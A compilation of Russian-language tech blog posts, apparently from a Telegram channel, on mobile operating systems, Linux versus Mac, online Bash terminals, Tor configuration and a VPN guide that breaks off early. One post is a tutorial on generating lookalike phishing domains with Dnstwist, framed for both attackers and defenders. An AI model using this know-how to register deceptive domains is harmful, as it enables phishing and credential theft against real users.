Firefox OS [продажи прекращены]

Несложно догадаться, что Firefox OS является опенсорс-проектом компании Mozilla, создателем интернет-браузера Mozilla Firefox. В свое время объявление о выпуске смартфонов на базе Firefox OS стоимостью всего 25$ наделало немало шума. Целевой аудиторией проекта были развивающиеся рынки вроде Бразилии и Индии. К сожалению, оказалось, что для повторения успеха Raspberry Pi одного лишь низкого ценника недостаточно. Как и в случае с Tizen, устройства ZTE на основе Firefox OS не обрели популярности и в конце 2015 года Mozilla прекратила их продажи. Однако эксперименты с Firefox OS продолжаются.

Ubuntu Touch [поддерживается сообществом]

В 2013 году король десктопных операционных систем Linux обзавелся мобильной версией — Ubuntu Touch. Компания Canonical запустила краудфандинговую кампанию, намереваясь собрать 32 миллиона долларов на разработку первого смартфона Ubuntu — Edge. Собрать удалось только 12 миллионов, но и эта сумма стала рекордной.

После провалившейся краудфандинговой кампании Canonical удалось выпустить Ubuntu Phone совместно с испанским производителем мобильных устройств bq и китайским — Meizu.Впоследствии появилось и несколько других моделей на Ubuntu Touch. В 2017 году в Canonical приняли решение прекратить разработку своей мобильной ОС, но сообщество UBports до сих пор поддерживает Ubuntu Touch на плаву.

7 преимуществ Linux перед Mac

2019-04-06T20:28:39.611Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Как Linux, так и macOS, являются Unixподобными операционными системами, поддерживающими управление командами с помощью командных оболочек Unix, BASH и других. Обе ОС проигрывают Windows по количеству написанных под них приложений и игр. Собственно, на этом сходство между Linux и macOS заканчивается. MacOS нежно любима графическими дизайнерами и видеоредакторами, в то время как Linux пользуется расположением разработчиков и сисадминов.

Так какая же из двух систем лучше? Этот вопрос каждый решает для себя. Мы же предлагаем вам ознакомиться с семью практическими и идеологическими преимуществами Linux перед Mac.

1. Цена

Предположим, что компьютер вам нужен, в основном, для поиска информации в интернете, просмотра фильмов, скачивания фото и создания документов. При этом вы хотите, чтобы ваша операционная система была безопасной.

Вы можете удовлетворить свою потребность, купив бюджетный ноутбук/ПК и бесплатно установив на него дистрибутив Linux. Другой вариант — приобрести дорогостоящий MacBook.Какой из этих вариантов лучше? Все зависит от ваших предпочтений.

Многие вполне довольны ОС Linux. Однако, если вы, скажем, профессионально занимаетесь музыкой или видеосъемкой, возможно, вам лучше выбрать Mac и тем самым получить доступ к приложениям Logic Pro X и Final Cut Pro.

2. Возможность выбора компьютера

Операционная система Linux распространяется бесплатно. Ее можно установить на компьютеры любой конфигурации. Даже если у вас старый ПК — Linux будет на нем работать. Просто выберите подходящий дистрибутив.

А вот Mac OS предназначена исключительно для компьютеров Apple. Если вы решили сами собрать компьютер или приобрести бюджетный ноутбук (с DOS) и установить на них Mac OS, эта затея вам вряд ли удастся.

Вообще, способы установить macOS на устройства, отличные от Apple, существуют. Однако процедура это сложная и требующая высокого уровня подготовки. В связи с чем возникает резонный вопрос — а стоит ли оно того?

Итак, если установить Linux можно практически на любой ПК, то Mac OS сильно ограничивает вас в выборе.

3. Безопасность

Многие поют дифирамбы безопасности iOS и Mac. Что ж, возможно, эти ОС безопаснее, чем Windows, но Linux в этом плане они уступают. Увы, это не преувеличение. Шпионское и рекламное ПО для macOS существует и его количество растет с каждым днем. Бывали случаи, когда причиной медленной работы компьютера Mac оказывался взломанный браузер.

Вообще, безопасных на 100% операционных систем не бывает. Уязвимости есть и у Linux, однако они своевременно и эффективно устраняются. К счастью, в мире Linux пока не существует автозапускающихся и распространяющихся через браузер вирусов. И это еще одна причина использовать Linux, а не Mac.

4. Персонализация

Вам не нравится какой-то элемент ОС Linux? Измените его или вообще удалите. Вот так просто!

Допустим, вам не нравится окружение рабочего стола Gnome в Ubuntu 18.04.1. Поменяйте его на KDE Plasma или установите какое-нибудь из расширений Gnome. Mac OS такой свободы персонализации не дает.

Кстати, на Linux вы можете даже менять исходный код ОС, что-то добавлять и удалять. Конечно, это потребует определенных технических знаний, но, так или иначе, у вас есть возможность создать собственную персонализированную ОС. А есть ли она на Mac OS?

Кроме того, Linux имеет множество дистрибутивов, направленных на решение разных задач. Например, если вам нужно копировать интерфейс Mac OS, на помощь придет дистрибутив Elementary OS. Хотите установить легковесный дистрибутив Linux на старый компьютер? У вас есть как минимум 10 вариантов. Mac OS такой гибкостью не отличается.

5. Помощь в построении карьеры [в сфере IT]

Данный пункт несколько спорный и относится, прежде всего, к студентам и молодым специалистам в области IT-технологий.

В процессе изучения ОС Linux вы получите ценный опыт, который пригодится вам при устройстве на работу. Любой IT-специалист должен уметь работать с терминалом, ориентироваться в файловой системе и устанавливать программы с помощью командной строки. Сами того не осознавая, вы научитесь тому, чему IT-компании специально обучают новых сотрудников.

Кроме того, зная Linux, вы сможете овладеть и множеством смежных технологий типа Cloud, Kubernetes или Sysadmin, и получить соответствующие сертификаты. С таким «багажом» шансы найти хорошую работу значительно возрастут!

6. Надежность

Вы когда-нибудь задумывались, почему Linux работает лучше других операционных систем на любом сервере? Потому что эта ОС самая стабильная! Почему Linux стабильнее, чем Mac OS?

Ответ прост — потому что она дает пользователю больше полномочий и одновременно защищает его данные. Mac OS не позволяет полностью управлять своей платформой, что облегчает ее использование и улучшает пользовательский опыт. На Linux вы можете делать все, что хотите, что (в некоторых случаях) может сказаться на пользовательском опыте негативно. Зато вы получаете более высокую надежность.

7. Открытый исходный код

Данный аспект заботит не каждого пользователя. Но для некоторых наличие открытого исходного кода является принципиальным моментом. Тем более, что многие из перечисленных достоинств Linux напрямую связаны с «опенсорсностью» этой операционной системы.

Для тех, кто не в курсе, поясним: ПО с открытым исходным кодом позволяет видеть и вносить изменения в код программы. В случае с Mac такие действия доступны исключительно компании Apple. Даже если вы обладаете всеми необходимыми знаниями, посмотреть исходный код Mac OS у вас не получится.

Иными словами, пользуясь Mac, вы получаете автомобиль, но не можете заглянуть под капот. И это печально.

Заключение

Итак, теперь вы знаете, чем Linux лучше Mac OS. Каковы ваши мысли по этому поводу? Достаточно ли названных причин, чтобы вы предпочли Linux Mac OS? Если нет, то какая ОС вам нравится и почему?

Лучшие онлайн терминалы Linux и редакторы Bash

2019-04-04T20:32:38.336Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Если вы хотите попрактиковать команды Linux или проанализировать/протестировать сценарии оболочки, вам на помощь придут онлайн терминалы Linux и компиляторы bash. Данные инструменты будут особенно полезны тем, кто пользуется операционной системой Windows. Конечно, можно просто установить Linux в Windows с помощью подсистемы Windows для Linux, но для быстрых тестов онлайн-терминалы Linux удобнее.

Где можно бесплатно скачать консоль Linux? И какую оболочку Linux лучше использовать?Чтобы вам не пришлось искать ответы на эти вопросы, мы составили список лучших онлайн-эмуляторов Linux, а также отдельный список лучших онлайн-редакторов bash. Примечание: Все представленные ниже терминалы поддерживают несколько браузеров, включая Google Chrome, Mozilla Firefox, Opera и Microsoft Edge.

Лучшие онлайн-терминалы для изучения команд Linux

Итак, обратимся сначала к Linux-терминалам. Перечисленные ниже ресурсы позволяют практиковать команды Linux в веб-браузере. Некоторые из них требуют регистрации.

1. JSLinux

JSLinux — это не просто терминал Linux, а полноценный виртуальный компьютер с эмуляцией процессора в браузере. JSLinux позволяет загружать на виртуальную машину файлы. Для создания встроенной системы Linux используется инструмент Buildroot. Как следует из названия, JSLinux полностью написан на JavaScript. Вы можете выбрать систему, основанную на консоли или GUI. Для того, чтобы практиковать команды Linux, нужно выбрать ту, что на консоли. Чтобы воспользоваться программой, придется зарегистрироваться.

2. Copy.sh

Copy.sh — один из лучших онлайн-эмуляторов Linux, быстрый и надежный. Программа выложена на GitHub и активно поддерживается разработчиками, что не может не радовать. Она совместима и с другими операционные системами, в частности:

Windows 98
KolibriOS
FreeDOS
Windows 1.01
Archlinux

3. Webminal

Webminal тоже является отличным онлайн-терминалом, который можно смело рекомендовать новичкам для отработки команд Linux. Удобство ресурса состоит в том, что он содержит несколько уроков по обучению Linux-командам. Таким образом, в процессе обучения вам не придется переключаться между окнами разных сайтов или делить одно окно на две части. Все будет в одном месте — в одной и той вкладке браузера.

4. Tutorialspoint Unix Terminal

Tutorialspoint — это очень популярный ресурс, предлагающий ценные и при этом бесплатные руководства по изучению практически всех языков программирования (и не только).Неудивительно, что здесь вы найдете и бесплатную Linux-консоль для отработки команд с использованием материалов сайта. Вы также сможете загружать файлы. Tutorialspoint Unix Terminal — простой, но полезный онлайн-терминал. Кроме того, на странице Coding Ground представлено много других онлайн-терминалов.

5. JS/UIX

Еще один терминал Linux — JS/UIX — написан полностью на JavaScript без каких-либо плагинов. С помощью виртуальной машины вы сможете практиковать команды Linux, изучать сценарии оболочки, файловую систему и т.д.

6. CB.VU

Для пользователей ОС FreeBSD стабильной версии 7.1 подойдет эмулятор cb.vu. В нем есть только базовый функционал, ничего лишнего. Вы просто вводите команды Linux и получаете соответствующий вывод. К сожалению, возможности загружать файлы тоже не предусмотрено.

7. Linux Containers

Linux Containers — один из лучших онлайн-терминалов Linux, предоставляющий для изучения команд Linux демо-сервер с 30-минутным таймером обратного отсчета. Проект спонсируется компанией Canonical.

8. Codeanywhere

Сервис Codeanywhere предлагает кроссплатформенные облачные IDE. Чтобы не платить за использование виртуальной машины Linux, потребуется регистрация на сайте. Выберите бесплатный тариф и создайте новое соединение, настроив контейнер с нужной вам ОС. Бесплатная Linux-консоль будет в вашем распоряжении.

Лучшие онлайн-редакторы Bash

Стоп! А разве онлайн-терминалы Linux не подходят для написания сценариев Bash? Подходят. Только вот создавать, а затем выполнять bash-скрипты в терминале не так удобно, как в редакторе Bash. С помощью bash-редакторов можно легко написать сценарий оболочки, а затем проверить, как он работает. Давайте посмотрим, какие программы позволяют запускать сценарии оболочки онлайн.

Tutorialspoint Bash Compiler

Как уже говорилось, помимо онлайн-эмулятора, Tutorialspoint предлагает много чего другого, в том числе и компилятор Bash. Это очень простой компилятор, позволяющий выполнять сценарии оболочки онлайн.

JDOODLE

JDOODLE — это еще один полезный онлайновый Bash-редактор, где можно тестировать скрипты Bash. JDOODLE предлагает и другие IDE, но нас, прежде всего, интересует выполнение Bash-скриптов. Задайте аргументы командной строки и стандартный ввод, и вы получите результат вашего кода.

Paiza.io

Paiza.io — хороший онлайновый Bash-редактор, опробовать который можно бесплатно. Для доступа к дополнительным функциям, например, планированию задач, потребуется регистрация. Сайт также поддерживает совместную работу в режиме реального времени (правда, пока данная возможность доступна только в режиме тестирования). Кроме того, на paiza.cloud есть и онлайн-терминал Linux.

ShellCheck

Интересный редактор Bash — ShellCheck — позволяет находить ошибки в сценариях оболочки. Программа выложена на GitHub и ее можно устанавливать локально на поддерживаемых платформах.

Rextester

Если вам нужен предельно простой онлайновый Bash-компилятор, выбирайте Rextester. Он также поддерживает и другие языки программирования.

Learnshell

Как и Webminal, Learnshell предоставляет пользователям учебные материалы и одновременно позволяет тестировать собственный код. Программа имеет как базовые, так и некоторые продвинутые функции.

Заключение

Теперь вы знакомы с наиболее надежными и быстрыми онлайн терминалами Linux и Bash-редакторами. Обучайтесь, тренируйтесь и «играйте» с кодом! Не нашли в списке свой любимый онлайн терминал Linux или компилятор Bash? Напишите нам об этом в коммен��ариях.

Как легко и просто сгенерировать сотни фишинговых доменов

2019-04-03T18:20:47.023Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Dnstwist, созданная @elceef — поисковая утилита, работа которой основана на перестановках букв в названии доменов. Она в состоянии обнаружить фишинговые домены, bitsquatting, Typosquatting и мошеннические веб-сайты с похожими доменными именами. Dnstwist на вход получает заданное доменное имя, а затем генерирует список потенциальных фишинговых доменов. Потом по сгенерированным доменным именам делаются запросы. Если обнаруженный домен перенаправляет запрос на веб-сервер, то Dnstwist запишет IP-адрес домена.

Как и большинство инструментов, предназначенных для тестирования на проникновение, Dnstwist — это палка о двух концах. Она может использоваться злоумышленниками для поиска идеальных доменов-кандидатов для проведения фишинговых атак, в ходе которых они могут клонировать целевой веб-сайт и заставить пользователей ввести свои учетные данные. Или же Dnstwist могут использовать специалисты по кибербезопасности и системные администраторы для того, чтобы быстро найти и определить похожие домены, созданные конкурентами и хакерами.

Поддерживаемые схемы доменных имен

Dsntwist поддерживает широкий круг создания фишинговых доменных схем и их типов, которые он может использовать для создания огромных списков потенциальных фишинговых доменов. Прежде чем переходить к инструкции по генерации доменных имен, посмотрим на каждую такую схему.

1. Добавление

Буквы добавляются в конце исходного доменного имени. Ниже приведен пример Bank of America, одного из крупнейших банков в Соединенных Штатах. В отличие от некоторых других вариантов, приведенных ниже, простое дополнение достаточно легко выявляется конечными пользователями даже при беглом взгляде на URL.

2. Бит-сквоттинг

Bitsquatting относится к регистрации доменных имен, отличающихся от настоящего домена всего на 1 бит. На скриншоте ниже приведен пример для Википедии — популярного и крупнейшего общего справочного сайта в Интернете. Определить подмену при беглом осмотре уже немного сложнее, чем в случае с «дополнением», потому что люди скорее не читают, а угадывают слова на основе первой и последней буквы, а не прочитывают каждую букву индивидуально.

3. Гомоглифы (homoglyph)

Фишинг-атаки с использованием гомоглифов называются гомографическими атаками, хотя альтернативные символы называются гомоглифами, а не гомографами. Гомоглиф — одна из двух или больше графем, знаков или глифов с формами, которые или кажутся идентичными, или не могут быть дифференцированы быстрым визуальным осмотром. Например, русская «а» и английская «a» — гомоглифы. Эти типы атак по-прежнему затрагивают Firefox и большинство Android-устройств, а недавно они стали известны благодаря Xudong Zheng, который создал первый фишинговый гомоглиф-адрес для apple.com. Используя Facebook в качестве примера, мы обнаружили, что имеется довольно много доменов для гомоглиф-фишинга, доступных за 11 долларов.

Чтобы проверить найденное доменное имя по базе данных регистраторов доменов, скопируйте и вставьте нужный домен из терминала Dnstwist в панель поиска регистратора.

4. Пропуск

Определенные буквы просто удаляются из названия домена. К нашему удивлению, все имена доменов Instagram были определены как доступные. Возвращаясь к примеру бит-сквоттинга выше — наверняка кто-то может заметить, что первая или последняя буква в имени домена отсутствует, но заметить пропущенную букву в середине слова — значительно сложнее.

5. Поддомен

Речь идет о точке, вставленной в разные позиции в конкретном доменном имени (например, goo.gl — сервис сокращенных ссылок Google). Если взять в качестве примера Gizmodo, то мы увидим, что домены «odo.com» и «zmodo.com» доступны для регистрации. Здесь речь идет только о том, что для создания эффективного фишингового домена достаточно создать убедительно выглядящий поддомен. Подобно «добавлению», этот способ может быть более очевиден пользователю, чем другие трюки.

6. Подмена гласных

Гласные буквы в конкретном домене меняются на другие гласные. При беглом взгляде многие из этих доменов, скорее всего, обманут большинство жертв и вынудят их кликнуть по поддельной ссылке. Опять же, это работает, поскольку большинство людей сканируют слова, используя первую и последнюю букву, а не прочитывают каждую букву в слове. Если заменяемая гласная будет на первом или последнем месте, то такой вариант, скорее всего не сработает.

Теперь, после того, как вы узнали те способы, которые Dnstwist может использовать для генерации и проверки доступных фишинговых доменов, давайте посмотрим, как использовать это на практике.

Шаг 1. Установка Dnstwist

У Dnstwist есть несколько зависимостей, которые можно установить в Kali Linux, введя команду в терминал:

apt-get install python-dnspython python-geoip python-whois python-requests python-ssdeep python-cffi

Теперь клонируйте репозиторий Dnstwist с GitHub.

git clone https://github.com/elceef/dnstwist

И, наконец, используйте команду cd, чтобы перейти в только что созданный каталог «dnstwist», а затем используйте команду ниже, чтобы просмотреть доступные параметры.

cd dnstwist /
./dnstwist.py --help

Шаг 2. Генерация фишинговых доменов с помощью Dnstwist

Чтобы начать генерацию фишинговых доменов с помощью Dnstwist, используйте команду ниже. В нашей команде используется несколько аргументов, расшифровка каждого из них дается под скриншотом.

./dnstwist.py --ssdeep --json --threads 40 website.com> website.com.json

Аргумент —ssdeep указывает Dnstwist анализировать HTML-код каждого домена и сравнивать его с HTML-кодом реального веб-сайта. Уровень сходства будет выражаться в процентах. Однако каждый веб-сайт нужно проверять вручную независимо от процентного уровня, выданного Dnstwist. Эти проценты необходимы для того, чтобы помочь специалистам по безопасности определить, какие домены, скорее всего, являются фишинговыми доменами.
Dnstwist поддерживает два выходных формата, которые могут использоваться с другими приложениями. Формат вывода —json использовался в нашем примере выше, но также поддерживается вывод в CSV, который может быть включен с использованием аргумента —csv вместо формата JSON. Чтобы сохранить любой формат в файл, можно использовать закрывающую угловую скобку и имя файла (> имя_файла), чтобы записать данные в указанный файл.
По умолчанию Dnstwist будет делать 10 запросов при проверке доступных фишинговых доменов по своему списку. Это число можно увеличить или уменьшить, используя аргумент —threads и указав нужное значение.

В нижней части терминала Dnstwist будет отображаться прогресс-бар. В зависимости от скорости сети и количества потоков этот процесс может занять несколько минут.

Всегда уделяйте особое внимание доменным именам

Как для хакера, готовящегося к фишинговой атаке, так и для системного администратора, защищающегося от таких атак, Dnstwist — это фантастический инструмент, используемый для выявления жизнеспособных доменов, которые могут быть использованы в противоправных целях. У Dnstwist несколько ключевых преимуществ по сравнению с аналогичными инструментами, такие как возможность анализа и сравнения HTML-кода потенциальных фишинговых-доменов, поддержка различных форматов вывода и широкий спектр генерируемых фишинговых доменов.

Если вы обычный пользователь, посещающий какой-нибудь веб-сайт, обращайте особое внимание на URL-адрес сайта, когда вы на него переходите. И хотя гомоглифы обнаружить трудно, остальные схемы заметить сравнительно легко, если вы потратите чуть больше времени, чтобы изучить их.

Надеемся, что вам понравилась эта статья о генерации и обнаружении фишинговых доменов с помощью Dnstwist. Если у вас есть вопросы или комментарии — оставляйте их ниже.

Учимся работать с Tor. Настройка Tor. Настройка Google Chrome через сеть TOR

2019-04-03T13:31:02.590Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Конфигурационный файл — обычный текстовый файл. Он носит имя torrc (без расширения) и находится:

— при использовании сборки Tor Browser — в каталоге ..\<Каталог Tor Browser>\Data\Tor

— в инсталлированных пакетах — <Documents and Settings\<пользователь>\Application Data\Vidalia

— в ОС Ubuntu Linux — в каталоге /etc/tor

Программа Tor при загрузке (перезагрузке) первым делом считывает конфигурационный файл и устанавливает рабочие параметры в соответствии со значениями команд в файле torrc.

Редактирование файла torrc можно производить в простейшем текстовом редакторе: Блокнот, AkePad и т. д. Желательно перед правкой сохранить первоначальный файл torrc в той же папке. Например, прибавив к имени расширение *.bak, *.001 и т. д.

Чтобы изменения вступили в силу нужно перезагрузить всё ПО системы Tor!

Фиксирование выходного или входного узла сети Tor

Напомним, что выходные сервера в Tor постоянно меняются случайным образом. Для пользователя это означает, что его IP не стабилен. С точки зрения посещаемого ресурса пользователь в любой момент может превратиться из француза, скажем, в японца, или ещё кого хуже. При работе с сайтами, фиксирующими сессию пользователя, такой вариант совершенно неприемлем.

Есть возможность прямо указывать, какой сервер (нод) должен быть выходным. IP в этом случае будет постоянным. Для этого в torrc дописываем две строчки:

ExitNodes <имя узла>

StrictExitNodes 1

Где:

Переменная ExitNodes – указывает использовать определённый сервер в качестве выходного узла

StrictExitNodes 1 – указание в случае недоступности выбранного сервера не пытаться подключиться к другому, а выводить ошибку.

Допускается записывать несколько узлов через запятую или, например, указав ExitNodes {de} — получим только немецкие сервера в качестве выходных. («Закосим» под немца!)

Аналогично фиксируется и входной узел:

EntryNodes <имя узла>

StrictEntryNodes 1

Есть ещё одна полезная настройка из этой серии — TrackHostExits фиксирует выходной узел (host) для заданных доменов, что позволяет сохранять сессию для тех серверов, которые проверяют IP клиентов. Синтаксис записи такой:

TrackHostExits host,.domain,…

Исключение подозрительных узлов

Для исключения не вызывающих доверия узлов (Например — российских, украинских и белорусских) нужно добавить в torrc строку:

ExcludeNodes {ru}, {ua}, {by}

Или можно указать конкретный список имён.

Теперь если пытливые ребята с серенькими глазками в РФ, УА или РБ додумаются сделать подставной Tor-сервер и попытаются прослушивать выходные данные, то мы никак не сможем попасть на такой сервер.

Есть полезное свойство файла torrc. Это комментарий. Tor не выполняет строки в файле torrc если строка начинается с символа «#». Благодаря комментариям вы можете хранить в файле torrc заготовки, и при необходимости быстро включать их, убрав «#».

Прописывание прокси-сервера в Tor

Добавить следующие строки в конец конфигурационного файла Tor с заменой <адрес прокси> и <номер порта> (а также <логин> и <пароль>, если они есть) на конкретные значения прописываемого http или https прокси-сервера.

# Force Tor to make all HTTP directory requests through this host:port (or

# host:80 if port is not set).

HttpProxy <адрес прокси>:<номер порта>

# A username:password pair to be used with HTTPProxy.

HttpProxyAuthenticator <логин>:<пароль>

# Force Tor to make all TLS (SSL) connectinos through this host:port (or

# host:80 if port is not set).

HttpsProxy <адрес прокси>:<номер порта>

# A username:password pair to be used with HTTPSProxy.

HttpsProxyAuthenticator <логин>:<пароль>

После правки и сохранения файла torrc необходимо перезапустить Tor.

Для проверки настроек можно использовать графическую оболочку Vidalia или Tor-анализатор (зайти на check.torproject.org).

Список некоторых команд (настроек) Tor

EntryNodes nickname, nickname …

Список серверов, которые предпочтительно использовать в качестве «входных» для установления TCP/IP-соединения с узловой цепочкой маршрутизаторов Tor, если это возможно.

ExitNodes nickname,nickname …

Список серверов, которым предпочтительно отводить роль замыкающего звена в узловой цепочке маршрутизаторов Tor, если это возможно.

ExcludeNodes nickname,nickname …

Список узлов, которые вовсе не следует использовать при построении узловой цепочки.

StrictExitNodes 0|1Если установлено в 1, Tor не будет использовать какие-либо узлы, кроме тех, которые присутствуют в списке выходных узлов в качестве посредников, устанавливающих соединение с целевым хостом и, соответственно, являющихся своеобразным замыкающим звеном в цепочке узлов.

StrictEntryNodes 0|1

Если данному параметру присвоено значение 1, Tor не будет использовать какие-либо узлы, кроме тех, которые присутствуют в списке входных узлов для подключения к сети Tor.

FascistFirewall 0|1

Если данному параметру присвоено значение 1, Tor при создании соединения будет обращаться исключительно на Луковые Маршрутизаторы, у которых для осуществления подключения открыты строго определённые номера портов, с коими позволяет устанавливать соединение Ваш файрволл (по умолчанию: 80-й (http), 443-й (https), см. FirewallPorts). Это позволит Tor, запущенному на вашей системе, работать в качестве клиента за файрволлом, имеющим жёсткие ограничительные политики. Обратное утверждение неверно, поскольку в этом случае Tor не сможет исполнять обязанности сервера, закрытого таким файрволлом.

FirewallPorts ПОРТЫ

Список портов, к которым Ваш файрволл позволяет подсоединяться. Используется только при установленном значении параметра FascistFirewall. (По умолчанию: 80, 443) (Default: 80, 443)

LongLivedPorts ПОРТЫ

Список портов для сервисов, которые имеют склонность устанавливать особо длительные соединения (к ним относятся преимущественно чаты, а также интерактивные оболочки) Узловые цепочки из маршрутизаторов Tor, которые используют эти порты, будут содержать только узлы c наиболее высоким аптаймом (характерным временем присутствия в сети), с целью уменьшения вероятности отключения узлового сервера от сети Tor до закрытия потока. (По умолчанию: 21, 22, 706, 1863, 5050, 5190, 5222, 5223, 6667, 8300, 8888).

MapAddress адрес:новый_адрес

Когда к Tor придёт запрос на указанный адрес, луковый маршрутизатор изменит адрес перед тем, как приступить к обработке запроса. Например, если вы хотите, чтобы при соединении с www.indymedia.org была использована цепочка узлов Tor с выходом через torserver (где torserver – это псевдоним сервера), используйте «MapAddress www.indymedia.org www.indymedia.org.torserver.exit».

NewCircuitPeriod ЧИСЛО

Каждые ЧИСЛО секунд анализировать состояние соединения и принимать решение о том, нужно ли иницииро��ать построение новой узловой цепочки. (По умолчанию: 30 секунд)

MaxCircuitDirtiness ЧИСЛО

Разрешить повторное использование цепочки, в первый раз собранная в определённом составе своих звеньев — самое большее — ЧИСЛО секунд назад, но никогда не присоединять новый поток к цепочке, которая обслуживала данный сеанс в течение достаточно продолжительного времени. (По умолчанию: 10 минут)

NodeFamily псевдоним, псевдоним …

Именованные сервера Tor (закономерным образом, для повышения степени прозрачности иерархии сети Tor) объединяются в «семейства» по признаку общего или совместного администрирования, так что следует избегать использования любых 2-х из таких узлов, «связанных родственными узами», в одной и той же цепочке анонимных маршрутизаторов Tor. Специальное задание опции NodeFamily может понадобиться только тогда, когда сервер с данным псевдонимом сам не сообщает о том, к какому «семейству» он себя причисляет, что на стороне сервера OR должно быть продекларировано путём указания параметра MyFamily в файле torrc. Допускаются множественные указания этой опции.

RendNodes псевдоним, псевдоним …

Список узлов, которые по возможности желательно использовать в качестве точек рандеву (встречи).

RendExcludeNodes псевдоним,псевдоним …

Список узлов, которые ни в коем случае не следует использовать при выборе точек рандеву (точек встречи).

SOCKSPort ПОРТ

Известить Tor о том, что на этом порту должны прослушиваться соединения, устанавливаемые приложениями, использующими SOCKS-протокол. Обнулите этот параметр, если Вам вовсе ни к чему, чтобы приложения устанавливали соединения по SOCKS-протоколу посредством Tor. (Значение по умолчанию: 9050)

SOCKSBindAddress IP[:ПОРТ]

Установить привязку к данному адресу для прослушивания запросов на соединение от приложений, взаимодействующих по SOCKS-протоколу. (По умолчанию: 127.0.0.1). Также Вы можете указать порт (например, 192.168.0.1:9100), который, разумеется, на целевой машине должен быть «открыт» посредством соотв. настройки файерволла. Определение этой опции может быть повторено многократно для осуществления одновременной («параллельной») привязки ко множеству различных адресов/портов.

SOCKSPolicy политика,политика …

Задаёт политики входа на данный сервер с целью ограничения круга клиентских машин, которым разрешено подключаться к SOCKS порту. Описание этих политик вводится аналогично тому, как это делается для политик выхода (см. ниже).

TrackHostExits хост,.домен …

Для каждого из значений в разделённом запятыми списке, Tor проследит недавние соединения для хостов, соответствующих этому значению и попытается использовать один и тот же выходной (замыкающий) узел для каждого из них. Если очередной элемент списка предваряется символом «.», то его значение будет трактоваться, как соответствующее домену в целом. Если один из элементов списка состоит из одной только «точки», то это указывает на его «универсальное» соответствие всем путевым именам. Эта опция может оказаться полезной, если Вы часто устанавливаете соединение с серверами, которые аннулируют все записи о пройденной Вами аутентификации (т.е. принуждают выйти и зарегистрироваться снова) при осуществлении попытки переадресации TCP/IP-соединения, установленного с одним из таких серверов, на Ваш новый IP-адрес после его очередной смены. Обратите особое внимание на то, что использование этой опции невыгодно для Вас тем, что это позволяет серверу напрямую ассоциировать историю соединений, запрашиваемых определённым IP, с Вашей пользовательской учётной записью. Хотя в принципе, если кому-то и понадобится собрать всю информацию о Вашем пребывании на сервере, желающие в любом случае смогут сделать это посредством cookies или других специфичных для используемого протокола обмена средств.

TrackHostExitsExpire ЧИСЛО

Поскольку серверы, являющиеся выходными звеньями узловой цепочки, имеют право начинать работу и завершать её по собственному усмотрению, т.е. так или иначе – произвольным, случайным образом, желательно, чтобы ассоциация между хостом и выходным узлом автоматически потеряла свою силу по истечении некоторого ЧИСЛА секунд полного отсутствия сетевой активности со стороны сервера. По умолчанию – 1800 секунд (30 минут).

Существующий набор команд Tor достаточно велик. Рассмотрение их всех выходит за рамки настоящего обозрения. Здесь были приведены лишь несколько наиболее типичных вариантов редактирования и лишь часть команд. Полный список и синтаксис команд (на английском языке) можно найти на сайте разработчиков Tor.

Настройка Google Chrome через сеть TOR

Действия в Торе (нам только нужно посмотреть его настройки):

1. Первым делом скачаем и запустим последнюю версию Тор браузера 3.5. При первом включении нажимаем соединиться, если у Вас нет особых настоек Интернета которые нужно ввести.

2. Заходим в “Настройки” Тора на панели задач. “Дополнительные”, “Сеть”. Под Сетью нажимаем в пункте Соединение вкладку “Настроить…”

3. Ничего не меняем, записываем или запоминаем настройки указанные на “Узел SOCKS”. В последней версии у меня на данный момент это 127.0.0.1 : 9150.

Действия в хроме:

1. На панели заходим в “Настройки”. Прокручиваем полностью вниз и нажимаем “Показать дополнительные настройки”.

2. Находим вкладку Сеть, нажимаем “Изменить настройки прокси сервера”.

3. В появившимся окне, во вкладе Подключения, внизу нажимаем

Настройка LAN.

В настройках локальной сети ставим галки (лишние убираем если стоят):

“Автоматическое определение параметров”

Использовать прокси сервер для подключений LAN

Нажимаем кнопку “Дополнительно”:

В пятом пункте Socks вводим:

Адрес прокси сервера 127.0.0.1

Порт 9150 (порт должен совпадать с портом в настройках вашего TOR).

В других строках оставляем все пустым. Галку “Один прокси на все” НЕ ставим.

Проверка результата:

Для проверки перейдите на сайт проверки IP: whoer.net (не реклама) или другой сайт проверки IP.

Советы:

Для удобного и быстрого серфинга в Интернете отключите загрузку картинок и Java script в Хроме. В этом случае скорость загрузки становиться ощутимо быстрой и не раздражающей.

Для страниц, на которых картинки и Java нужны, их можно подгрузить, включив их для Данной страницы в правом верхнем углу в конце адресной строки Хрома и перезагрузив страницу.

При этом не надо каждый раз лезть в настройки! Удобно и быстро. В лисе такого нет.

Google Chrome через ТОР работает только при включенном ТОРе. Без Тора страницы загружаться с этими настройками не будут.

Учимся поднимать собственный VPN на сервере

2019-04-01T14:21:07.392Z

Наш telegram канал : @Save and betray

Вступай в наши ряды

Зачем нужен VPN

VPN обычно используют разные предприятия и организации, что бы объединить разные её филиалы или удаленных пользователей, которые находятся физически далеко друг от друга, в одну сеть. Но нам интересно не это.

VPN позволяет выходить в сеть от пользователя с другим IP адресом, возможно, другой страны, что дает возможность обходить разного рода блокировки или воспользоваться ресурсами, которые доступны только для пользователей определенных стран (допустим существует сайт, который доступен только для пользователей Германии).

Также, если ваш провайдер не предоставляет вам статический IP адрес, VPN может быть использован для создания такого выделенного IP.

Для нас VPN является отличным средством анонимизации и защиты нашего трафика от провайдера.

VPN будет скрывать от вашего провайдера ресурсы, которые вы посещаете. А от ресурсов, которые вы посещаете, VPN будет скрывать ваш реальный IP адрес.

VPN часто используется как средство для сокрытия Tor-траффика от вашего провайдера, ведь запуская VPN, а затем Tor Браузер, ваш трафик имеет цепь VPN -> Tor, что означает, что факт использования Tor скрыт от провайдера, в ваш настоящий IP адрес не палится перед первой (входной) нодой сети Tor.

VPN протоколы

Существует множество разных протоколов VPN.

OpenVPN — это протокол с открытым исходным кодом, использующий библиотеку OpenSSL — поддерживает большое количество шифров, очень безопасный, достаточно гибкий в настройке, может работать на любом порту, быстрый по скорости. Для работы необходимо стороннее ПО (клиенты OpenVPN под разные ОС, об этом ниже). Клиентский файл .ovpn может использоваться на любой ОС, в том числе и мобильных. Везде рекомендую вам именно OpenVPN.

